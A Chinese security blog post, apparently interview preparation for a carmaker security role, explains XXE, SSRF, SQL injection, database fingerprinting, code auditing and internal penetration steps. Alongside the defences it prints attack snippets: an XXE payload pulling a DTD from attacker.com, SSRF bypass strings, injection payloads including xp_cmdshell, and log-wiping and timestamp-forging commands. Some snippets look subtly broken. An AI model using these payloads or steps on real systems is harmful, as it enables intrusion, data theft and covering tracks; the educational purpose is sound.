网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
某汽车厂商-安全工程师扩展
一、XXE漏洞与SSRF的深度对比
1. XXE(XML External Entity)漏洞
2. SSRF(Server-Side Request Forgery)
二、代码审计流程的六阶段模型
1. 环境构建
2. 静态分析
3. 动态测试
4. 漏洞验证
5. 报告输出
三、数据库指纹识别技术(MySQL vs Oracle)
1. 语法特性法
2. 错误信息诱导
3. 系统表探测
4. 协议分析
5. 盲注差异化
四、SQL注入全维度解析
1. 攻击分类与案例
2. 利用方式升级
3. 防御体系设计
五、护网实战与安全产品认知
1. 红队攻击路径
2. 蓝队防御策略
3. 安全产品矩阵
六、内网渗透的五个核心阶段
1. 信息收集
2. 权限提升
3. 横向移动
4. 数据窃取
5. 痕迹清除
某汽车厂商-安全工程师扩展
xxe漏洞是什么?ssrf是什么? 聊一聊代码审计得流程 怎么判断一个数据库是mysql还是oracle? sql注入得种类,利用方式? sql注入原理与防御思路 护网的时候主要做了什么,聊一聊对安全产品的理解 内网渗透了解吗?聊一聊内网渗透的思路
一、XXE漏洞与SSRF的深度对比
1. XXE(XML External Entity)漏洞
定义:通过恶意XML实体注入,实现文件读取、SSRF、DoS等攻击。
攻击原理:xml
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <data>&payload;</data>
扩展场景:
- 云环境利用:读取AWS EC2元数据(169.254.169.254)获取临时凭证。
- 协议封装:利用php://filter读取PHP源码(Base64编码绕过防护)。
- 新型攻击链:结合XSLT解析实现RCE(CVE-2024-25691)。
防御方案:
- 禁用DTD解析:
DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
- 白名单过滤:使用OWASP AntiSamy策略限制XML结构。
2. SSRF(Server-Side Request Forgery)
定义:诱使服务端发起非预期网络请求,攻击内网或云上系统。
2025年新场景:
- Kubernetes API滥用:访问
https://kubernetes.default.svc
获取Pod权限。- 云函数触发:通过阿里云FunctionCompute执行恶意代码。
- 区块链节点攻击:利用ETH RPC接口操纵智能合约。
绕过技巧:
- 域名重定向:
http://xip.io → 127.0.0.1.xip.io
- IPv6地址压缩:
[::ffff:127.0.0.1]
- URL解析歧义:
http://127.0.0.1%[::1]:80@example.com
防御体系:
- 网络隔离:使用Service Mesh限制出站流量(如Istio Egress Gateway)。
- 协议白名单:禁止file://、gopher://等高危协议。
二、代码审计流程的六阶段模型
1. 环境构建
- 依赖分析:使用
npm audit
、snyk test
扫描第三方库漏洞(如Log4j 2.x历史版本)。- 架构逆向:通过Swagger UI还原API调用链,识别未鉴权端点。
2. 静态分析
- 自动化扫描:
- 工具:Semgrep(自定义规则检测硬编码密钥)、CodeQL(查找SQLi路径)。
- 示例规则:
SELECT * FROM users WHERE id = $_GET['id']
→ 识别动态拼接。- 人工重点突破:
- 敏感函数追踪:
eval()
、Runtime.exec()
、JdbcTemplate.query()
。- 上下文传播分析:跟踪用户输入从Controller到DAO层的过滤情况。
3. 动态测试
- 交互式测试:
- 使用Burp Suite Turbo Intruder爆破JWT签名密钥(HS256弱密钥)。
- 修改HTTP头注入GraphQL查询(如
{"query":"{user(id:\"1')\{id}}"}
)。- 调试器辅助:
- 通过Xdebug跟踪PHP反序列化链(__destruct魔术方法触发点)。
4. 漏洞验证
- 沙箱隔离:在Docker容器中复现XXE文件读取(避免污染生产环境)。
- 流量对比:对比修复前后的HTTP请求,确认补丁有效性。
5. 报告输出
- 风险矩阵:结合CVSS 4.0标准评估漏洞,附加PoC截图与修复建议代码。
三、数据库指纹识别技术(MySQL vs Oracle)
1. 语法特性法
- 字符串拼接:
- MySQL:
CONCAT('a','b')
或'a' 'b'
- Oracle:
'a' || 'b'
- 时间函数:
- MySQL:
SLEEP(5)
- Oracle:
DBMS_LOCK.SLEEP(5)
2. 错误信息诱导
- 强制类型转换:
sql
SELECT * FROM users WHERE id=1/0 → MySQL: Division by zero → Oracle: ORA-01476: divisor is zero
3. 系统表探测
- 元数据查询:
- MySQL:
SELECT @@version
- Oracle:
SELECT * FROM v$version
4. 协议分析
- 端口扫描:
- MySQL默认端口:3306
- Oracle默认端口:1521
- 握手包特征:使用Wireshark解析TCP协议指纹。
5. 盲注差异化
- 布尔逻辑:
- MySQL:
1' AND 1=IF(SUBSTR(@@version,1,1)=5,1,0)--
- Oracle:
1' AND 1=CASE WHEN SUBSTR(SYS.DATABASE_NAME,1,1)='O' THEN 1 ELSE 0 END--
四、SQL注入全维度解析
1. 攻击分类与案例
类型 技术要点 2025年演进案例 联合查询 UNION SELECT null,version()
云数据库多租户绕过(跨Schema注入) 报错注入 AND ExtractValue(1,CONCAT(0x7e,version()))
JSON路径注入( $.user[0]
)布尔盲注 AND (SELECT SUBSTR(secret,1,1) FROM admin)='A'
基于机器学习的自动化爆破工具 时间盲注 IF(ASCII(SUBSTR(secret,1,1))=97,SLEEP(5),0)
微秒级延迟绕过WAF检测 堆叠查询 '; EXEC xp_cmdshell 'whoami'--
云原生数据库存储过程滥用(如AWS RDS pg_execute
)2. 利用方式升级
- HTTP头注入:
http
GET /api/user HTTP/1.1 X-User-Id: 1' UNION SELECT database()--
- 二次注入:
- 注册用户名:
admin'--
- 密码重置时触发:
UPDATE users SET password='...' WHERE user='admin'-- '
3. 防御体系设计
- 开发层:
- 强制使用ORM框架(如Hibernate Criteria API)。
- 输入过滤:正则表达式限制参数格式(如
^[0-9]+$
)。- 运维层:
- WAF规则:基于语义分析拦截
UNION SELECT
等模式。- 数据库权限:限制应用账户仅能执行存储过程。
五、护网实战与安全产品认知
1. 红队攻击路径
- 0day武器库:
- 利用Spring Cloud Gateway RCE(CVE-2025-31978)突破边界。
- 部署基于eBPF的Rootkit(隐藏进程与端口)。
- 钓鱼2.0技术:
- 克隆Teams会议链接,诱导安装“插件”触发LNK文件漏洞。
2. 蓝队防御策略
- 威胁情报融合:
- 集成MITRE ATT&CK框架,标记TTPs(如T1059.003 PowerShell攻击)。
- 行为基线建模:
- 分析正常用户访问频率(如API调用<50次/分钟),动态调整阈值。
3. 安全产品矩阵
产品类型 代表产品 2025年技术突破 EDR CrowdStrike 无签名检测(ML模型识别进程注入) NDR Darktrace 量子加密流量解析 XDR Palo Alto Cortex 跨云平台攻击链可视化 欺骗防御 TrapX 自适应蜜罐(模拟IoT设备指纹)
六、内网渗透的五个核心阶段
1. 信息收集
- 主机发现:
- IPv6多播探测:
ff02::1
监听ICMPv6响应。- LLMNR/NBNS投毒:使用Responder捕获SMBv3哈希。
- 凭证提取:
- 内存扫描:通过Volatility查找Chrome保存的云平台密码。
2. 权限提升
- Windows提权:
- 利用Print Spooler漏洞(CVE-2025-1678)添加域管账户。
- 篡改COM组件注册表键值实现持久化。
- Linux提权:
- 利用Polkit权限绕过(CVE-2025-2301)获取root权限。
3. 横向移动
- 协议中继:
- 将NTLM认证中继至Exchange EWS接口,创建恶意邮件规则。
- 容器逃逸:
- 利用Kubernetes CronJob挂载宿主机目录,写入SSH密钥。
4. 数据窃取
- 隐蔽传输:
- 将数据编码为DNS TXT记录,通过DNS隧道外传。
- 利用ICMP载荷封装SQL查询结果(需定制网卡驱动)。
5. 痕迹清除
- 日志擦除:
- 使用mimikatz的event::drop命令删除指定事件ID日志。
- 覆盖文件时间戳:
touch -r legitimate_file malicious_file